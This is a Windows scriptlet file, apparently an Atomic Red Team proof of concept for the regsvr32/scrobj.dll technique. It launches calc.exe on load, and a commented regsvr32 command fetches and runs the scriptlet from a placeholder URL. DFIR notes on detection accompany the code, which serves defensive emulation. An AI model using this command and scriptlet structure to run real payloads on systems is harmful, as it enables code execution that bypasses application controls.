<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll -->
	<!-- DFIR -->
	<!-- .sct files are downloaded and executed from a path like the one shown below. -->
	<!-- The name and extension are arbitrary, though. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, because the command calls "uninstall" (regsvr32 /u). -->


	<!-- Proof Of Concept - Casey Smith @subTee --> 
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
	<script language="JScript">
		<![CDATA[

			// Top-level statement of the <registration> script, not wrapped in a function.
			// It starts calc.exe through WScript.Shell as the proof-of-concept payload.
			// NOTE(review): for detection, the spawned process is expected to show
			// regsvr32.exe as its parent when the scriptlet is loaded with the command
			// line in the comment above; confirm against your own process telemetry.
			var shell = new ActiveXObject("WScript.Shell");
			var r = shell.Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	// Exec is the method published by the <public> element of this scriptlet.
	// It starts notepad.exe through WScript.Shell; nothing in this file calls it,
	// so it runs only when a caller invokes the component's Exec method.
	// The value returned by Run is stored in a local and never used.
	function Exec()
	{
		var shell = new ActiveXObject("WScript.Shell");
		var r = shell.Run("notepad.exe");
	}

]]>
</script>

</scriptlet>